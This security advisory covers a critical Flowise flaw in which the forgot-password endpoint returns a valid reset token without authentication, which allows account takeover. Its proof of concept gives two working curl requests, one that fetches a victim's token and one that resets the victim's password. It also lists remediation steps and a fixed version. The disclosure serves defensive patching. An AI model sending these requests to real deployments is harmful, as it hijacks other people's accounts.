GHSA-wgpv-6j63-x5ph
CRITICALFlowise Cloud and Local Deployments have Unauthenticated Password Reset Token Disclosure that Leads to Account Takeover
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
flowiseReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects npm packages — download data is not available via public APIs for these ecosystems.
Description
Summary
The forgot-password endpoint in Flowise returns sensitive information including a valid password reset tempToken without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete account takeover (ATO).
This vulnerability applies to both the cloud service (cloud.flowiseai.com) and self-hosted/local Flowise deployments that expose the same API.
CVSS v3.1 Base Score: 9.8 (Critical)
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Details
-
The endpoint
/api/v1/account/forgot-passwordaccepts an email address as input. -
Instead of only sending a reset email, the API responds directly with sensitive user details, including:
- User ID, name, email, hashed credential, status, timestamps.
- A valid
tempTokenand its expiry, which is intended for password reset.
-
This
tempTokencan then be reused immediately in the/api/v1/account/reset-passwordendpoint to reset the password of the targeted account without any email verification or user interaction. -
Exploitation requires only the victim’s email address, which is often guessable or discoverable.
-
Because the vulnerable endpoints exist in both Flowise Cloud and local/self-hosted deployments, any exposed instance is vulnerable to account takeover.
This effectively allows any unauthenticated attacker to take over arbitrary accounts (including admin or privileged accounts) by requesting a reset for their email.
PoC
- Request a reset token for the victim
curl -i -X POST https://<target>/api/v1/account/forgot-password \
-H "Content-Type: application/json" \
-d '{"user":{"email":"<[email protected]>"}}'
Response (201 Created):
{
"user": {
"id": "<redacted-uuid>",
"name": "<redacted>",
"email": "<[email protected]>",
"credential": "<redacted-hash>",
"tempToken": "<redacted-tempToken>",
"tokenExpiry": "2025-08-19T13:00:33.834Z",
"status": "active"
}
}
- Use the exposed
tempTokento reset the password
curl -i -X POST https://<target>/api/v1/account/reset-password \
-H "Content-Type: application/json" \
-d '{
"user":{
"email":"<[email protected]>",
"tempToken":"<redacted-tempToken>",
"password":"NewSecurePassword123!"
}
}'
Expected Result: 200 OK
The victim’s account password is reset, allowing full login.
Impact
-
Type: Authentication bypass / Insecure direct object exposure.
-
Impact:
- Any account (including administrator or high-value accounts) can be reset and taken over with only the email address.
- Applies to both Flowise Cloud and locally hosted/self-managed deployments.
- Leads to full account takeover, data exposure, impersonation, and possible control over organizational assets.
- High likelihood of exploitation since no prior access or user interaction is required.
Recommended Remediation
- Do not return reset tokens or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel.
- Ensure
forgot-passwordresponds with a generic success message regardless of input, to avoid user enumeration. - Require strong validation of the
tempToken(e.g., single-use, short expiry, tied to request origin, validated against email delivery). - Apply the same fixes to both cloud and self-hosted/local deployments.
- Log and monitor password reset requests for suspicious activity.
- Consider multi-factor verification for sensitive accounts.
Credit
⚠️ This is a Critical ATO vulnerability because it allows attackers to compromise any account with only knowledge of an email address, and it applies to all deployment models (cloud and local).
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 📦npm | flowise | all versions | 3.0.6 |
Research use only. For defensive security, authorized penetration testing, and academic research only. Never execute exploit code against systems without explicit written authorization.
Flowise < 3.0.5 - Missing Authentication for Critical Function
by andersoncezar048 · May 13, 2026
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for flowise. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update flowise to 3.0.6 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-wgpv-6j63-x5ph is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-wgpv-6j63-x5ph is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-wgpv-6j63-x5ph. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-wgpv-6j63-x5ph in your dependencies?
O3 detects GHSA-wgpv-6j63-x5ph across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.